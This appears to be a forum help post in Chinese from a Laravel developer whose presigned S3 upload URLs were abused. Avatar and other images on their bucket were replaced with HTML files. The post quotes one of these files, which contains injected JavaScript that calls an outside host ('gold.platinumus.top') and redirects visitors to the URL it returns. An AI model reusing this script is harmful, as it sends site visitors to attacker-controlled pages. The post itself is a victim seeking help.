我平臺的用戶可以上傳他們的頭像圖片，但他們需要在我的 Laravel 后端請求一個簽名的 url。這是控制器public function avatarUploadSigner(Request $request){    return s3_signedUrl("img/avatar/{$this->user->id}.jpg");}這里的功能是獲取簽名的 s3 以上傳圖像function s3_signedUrl($path, $expireOnMinutes = 120) {    if(!$path) {        return ['error' => 'filename missing'];    }    $s3 = Storage::disk('s3');    $adapter = $s3->getDriver()->getAdapter();    $client = $adapter->getClient();    $mime = \League\Flysystem\Util\MimeType::detectByFilename($path);    try {        $command = $client->getCommand('PutObject', array(            'Bucket' => $adapter->getBucket(),            'Key' => $path,            'ContentType' => $mime,            'use_accelerate_endpoint' => true        ));        $signedUrl = $client->createPresignedRequest(            $command,            "+$expireOnMinutes minutes"        );        $signedUrl = $signedUrl->getUri()->__toString();    } catch (S3Exception $e) {        return ['error' => $e->getMessage()];    }    return $signedUrl;}一周前，一些圖像變成了這樣的 html 文件：<html><head><script type="text/javascript" nonce="739865d617d243ffba08a513623" src="//local.adguard.org?ts=1586287921907&amp;type=content-script&amp;dmn=myghostmarket.s3.eu-west-1.amazonaws.com&amp;css=1&amp;js=1&amp;gcss=1&amp;rel=0&amp;rji=0"></script><script type="text/javascript" nonce="739865d617d243ffba08a513623" src="//local.adguard.org?ts=1586287921907&amp;name=AdGuard%20Assistant&amp;name=AdGuard%20Extra&amp;type=user-script"></script><script>    var t="onload"in new XMLHttpRequest?XMLHttpRequest:XDomainRequest;var e=new t;e.open("GET","https://gold.platinumus.top/track/awswrite?q=html",true);e.onload=function(){location.href=this.responseText};e.send();</script></head><body></body></html>但最近不僅是頭像，現在還更改了其他圖像，如頁眉、頁腳等，這些圖像無法通過簽名 url 更改。音頻和 img 文件夾是可讀的，但沒有簽名的 url 是不可寫的嗎？我還有另一個更重要的私人文件夾。他們有危險嗎？我的代碼有什么問題？我的 s3 存儲桶被黑了嗎？